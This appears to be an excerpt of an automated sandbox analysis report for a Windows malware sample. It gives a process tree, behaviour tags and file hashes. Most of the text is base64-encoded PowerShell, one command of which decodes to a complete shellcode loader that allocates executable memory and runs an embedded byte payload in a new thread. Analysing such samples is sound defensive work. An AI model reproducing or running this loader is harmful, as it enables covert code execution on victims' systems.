ACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABuAGYASQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG4AZgBJACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAzADEALAAwAHgAZABkACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAMQAsADAAeABlADIALAAwAHgAYwA0ACwAMAB4ADIAMQAsADAAeAA2ADMALAAwAHgAYQA2ACwAMAB4ADIANgAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4AGMANwAsADAAeABhAGYALAAwAHgAMwBmACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4ADMANAAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADkAOAAsADAAeAAxADkALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgAOAA5ACwAMAB4ADgAOAAsADAAeABmADEALAAwAHgAZAA4ACwAMAB4AGIAZQAsADAAeAAzADkALAAwAHgAYgBmACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgAYgBhACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4ADcAMwAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGEAYgAsADAAeAA3ADIALAAwAHgANAA1ACwAMAB4ADUAZAAsADAAeAA0ADEALAAwAHgAMgA2ACwAMAB4ADEAZQAsADAAeAAyADkALAAwAHgAZgA3ACwAMAB4AGQANwAsADAAeAAyAGIALAAwAHgANgA3ACwAMAB4AGMAYgAsADAAeAA1AGMALAAwAHgANgA3ACwAMAB4ADYAOQAsADAAeAA0AGIALAAwAHgAOAAwACwAMAB4ADMAMAAsADAAeAA4ADgALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAZAAzACwAMAB4ADUAYwAsADAAeAA5ADkALAAwAHgAOQBmACwAMAB4ADYAZgAsADAAeABkADUALAAwAHgAOAAxACwAMAB4AGYAYwAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeAAzADYALAAwAHgAMgAwACwAMAB4ADIAZgAsADAAeABlAGIALAAwAHgAMAA2ACwAMAB4AGMAOQAsADAAeAA4ADMALAAwAHgAZAAyACwAMAB4AGEANgAsADAAeAAzADgALAAwAHgAZABhACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAYQAzACwAMAB4AGEAOQAsADAAeAA2AGQALAAwAHgANwAyACwAMAB4ADUAZQAsADAAeABhADkALAAwAHgAYQA5ACwAMAB4ADAAOAAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADIAYQAsADAAeABhAGEALAAwAHgANABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANABhACwAMAB4ADgAMwAsADAAeAA3ADAALAAwAHgANQBjACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAZgA3ACwAMAB4ADMAYQAsADAAeAA0ADUALAAwAHgANgBmACwAMAB4AGQANAAsADAAeAAzADAALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABkAGIALAAwAHgAOQA2ACwAMAB4AGYAMwAsADAAeABiAGUALAAwAHgAZgBmACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANgA0ACwAMAB4ADkAZQAsADAAeAA2ADMALAAwAHgAMAA1ACwAMAB4AGMAYgAsADAAeAA5AGYALAAwAHgANwA0ACwAMAB4AGUANgAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAYQAwACwAMAB4ADMANAAsADAAeAA1AGQALAAwAHgANAA0ACwAMAB4ADAANQAsADAAeAA3ADQALAAwAHgANQBlACwAMAB4ADkANAAsADAAeAAwADEALAAwAHgAMABmACwAMAB4ADIAZAAsADAAeABhADYALAAwAHgAOABlACwAMAB4AGIAYgAsADAAeABiADkALAAwAHgAOABhACwAMAB4ADQANwAsADAAeAA2ADUALAAwAHgAMwBkACwAMAB4AGUAYwAsADAAeAA3AGQALAAwAHgAZAAxACwAMAB4AGQAMQAsADAAeAAxADMALAAwAHgANwBlACwAMAB4ADIAMQAsADAAeABmAGIALAAwAHgAZAA3ACwAMAB4ADIAYQAsADAAeAA3ADEALAAwAHgAOQAzACwAMAB4AGYAZQAsADAAeAA1ADIALAAwAHgAMQBhACwAMAB4ADYAMwAsADAAeABmAGUALAAwAHgAOAA2ACwAMAB4ADgAYwAsADAAeAAzADMALAAwAHgANQAwACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAAyADkALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeAA5AGUALAAwAHgAMQA2ACwAMAB4ADMANAAsADAAeAAxADEALAAwAHgANwA1ACwAMAB4ADMAZgAsADAAeAA1AGMALAAwAHgAZQA1ACwAMAB4ADcANgAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADgAZQAsADAAeAAxADMALAAwAHgAMwAzACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADkAZAAsADAAeAA3ADMALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeABlADIALAAwAHgAMQBiACwAMAB4AGUAMgAsADAAeAA4ADcALAAwAHgAZAA2ACwAMAB4ADUAYgAsADAAeAAwAGIALAAwAHgAMAAyACwAMAB4ADkAZAAsADAAeAAxAGIALAAwAHgAZQA4ACwAMAB4AGMANwAsADAAeABhADgALAAwAHgAYwBiACwAMAB4ADcAOAAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4AGUAYgAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADQAYgAsADAAeAA4ADEALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABjADQALAAwAHgAMwBkACwAMAB4ADQAMAAsADAAeAA1AGMALAAwAHgAOQBlACwAMAB4AGQAYwAsADAAeAA4AGQALAAwAHgANABhACwAMAB4AGQAYQAsADAAeABkAGUALAAwAHgAMAA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAMAA4ACwAMAB4ADQANAAsADAAeAAxAGYALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeABjADIALAAwAHgAMgAwACwAMAB4ADcAOQAsADAAeAAxADkALAAwAHgAZQBhACwAMAB4AGIANAAsADAAeAA4ADYALAAwAHgAOAA4ACwAMAB4AGIAZAAsADAAeAAyADAALAAwAHgAOAA1ACwAMAB4AGUAZAAsADAAeAA4ADkALAAwAHgAZQBlACwAMAB4ADcANgAsADAAeABkADgALAAwAHgAOAAyACwAMAB4ADIANwAsADAAeABlADMALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0ADcALAAwAHgAZQAzACwAMAB4ADIAMwAsADAAeABmAGMALAAwAHgAMQAxACwAMAB4ADYAOQAsADAAeAAyADQALAAwAHgAOQA0ACwAMAB4AGMANQAsADAAeABjADkALAAwAHgANwA3ACwAMAB4ADgAMQAsADAAeAAwADkALAAwAHgAYwA0ACwAMAB4AGUAYgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYwBmACwAMAB4ADMANwAsADAAeAA4ADAALAAwAHgANgAzACwAMAB4ADMANgAsADAAeAA3AGYALAAwAHgAMABmACwAMAB4ADkAYgAsADAAeAAxAGQALAAwAHgAOAAxACwAMAB4ADcAMwAsADAAeAA0AGEALAAwAHgANQBiACwAMAB4AGYANwAsADAAeAA5AGQALAAwAHgANABlADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABGAGUAUwBOAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABGAGUAUwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABGAGUAUwBOACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"6⤵PID:4776
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
1KB
MD532301361b323937c28a85c9e3626607b
SHA14476c5069156ae769ee91eef123c51204f20468c
SHA256e3da5c07c50ac0166d7a7391687a256973c6c59e01a2dc147c376bcb3f383aa6
SHA5125c7cd2b42fed276f134261677fdb3f733e6ae4e45bd9d10a974de93f90440fd75bd93c024e2fe2f4c2bef24f0c032deffb933d62855f9051ebd4d8651c4ef243
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD571bbf2f34607364c50420c9db477d25c
SHA178febc656937380b72684fa09f74d707d5a669eb
SHA256d3dcc264749ebcef1489722ddd0a1f72547cde119d091b50c53eec33d8b4a9a5
SHA512a5d8532c9a8bc43d3d2681e8a96dd67a277d62be5bf90cab9d135132eeccfda570634e803ca87a14fac959e22e1db9559b09841e27387cb72c9ffbc0df4ad139
-
Filesize
652B
MD57b179e0bbe6cdabcb8adb8846f7ab4e8
SHA1d7e4dfdf2f378f889f652008abd204c81de3660b
SHA2565b850be8355ad0509406ad1d3ced0173a62b7dd4c7004437669fd12f1ac3edec
SHA512ac5143f24ddace9a581653e8ed80bda120f93544a822a16d3a3552e57f9c666c60075d76e4cbff8b4f10199f23375655fa8a5109565edf84a398d7383d310e35
-
Filesize
557B
MD57319070c34daa5f6f2ece2dfc07119ee
SHA1f26a4a48518a5608e93c8b77368f588b0433973c
SHA256b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA51234169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd
-
Filesize
369B
MD59b594472d3edd2866e41a9409e174c28
SHA1fb712249b60038b2d2b4c690acf70a7c78774281
SHA256962cfab3660f467575af9bd80140232b991b0eb58f8c5ac5cc8e35229376f17c
SHA512ef277ee443c64be051e9add3a2d2ec818b519223739fababc9806784fb05017e508f4eaf31bfb4bb618a22772048ea358d966302f6095972f3f3466d2901bbaa